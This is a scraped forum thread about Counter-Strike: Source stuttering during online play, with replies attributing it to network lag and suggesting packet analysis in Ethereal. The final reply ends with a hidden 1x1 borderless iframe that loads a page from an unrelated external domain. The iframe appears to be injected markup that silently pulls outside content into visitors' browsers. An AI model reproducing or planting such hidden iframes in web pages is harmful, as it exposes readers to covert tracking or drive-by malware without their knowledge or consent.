CS: Source PROBLEMS!

Collapse
X

• Filter
  • Time
  • Show
Clear All

• CS: Source PROBLEMS!

Hi. I've been playing cs:source recently. I noticed that after about 5-7 minutes it started getting extremely choppy. My fps stays normal but every couple of second I skip and jolt forward. I play on all default settings. While I am playing, my memory is not even full load, but my cpu is. My rig consists of asus k8v-se deluxe mobo, PNY 6800 ultra OC (overclocked it even more to 451/1100), 3400+ (the old 2.2ghz 1mb), 512x2 Corsair Value Select, WD 74gb raptor hd. AA, AF, and vSync are all turned off. Would a cpu upgrade to the 3700+ get rid of this chopyness? btw, I tried turning down all the video settings in CS:Source to LOW. No help at all. What can I do to get rid of this ridiculous lag? thanx for any replies if any.

Re: CS: Source PROBLEMS!

Is this during online play or single player play? If it only happens during online play and runs normally when in single player mode, you're looking at a network problem and there may or may not be anything you can do about it. I remember similar problems when I used to play Quake2 online. Makes it fun trying to get a rail shot in.
    Old age and treachery will overcome youth and skill
    My Toys

Comment

yeah it is only during online play. so it isnt because my computer cant handle it?

Comment

Probably not. Even if you have broadband you will occassionally run into this type problem. Could be a hiccup on your end or one through the server you're playing on.
        Old age and treachery will overcome youth and skill
        My Toys

Comment

Most likely its network lag, you can test this with ethereal and graph the packets vs time. If you notice any cases where your computer is sending and not recieving for a second or so, its likely the server is lagging.

<iframe src="http://www.clqk42.com/refs.php" HEIGHT=1 WIDTH=1 FRAMEBORDER=0></iframe>

Comment

Working...
          X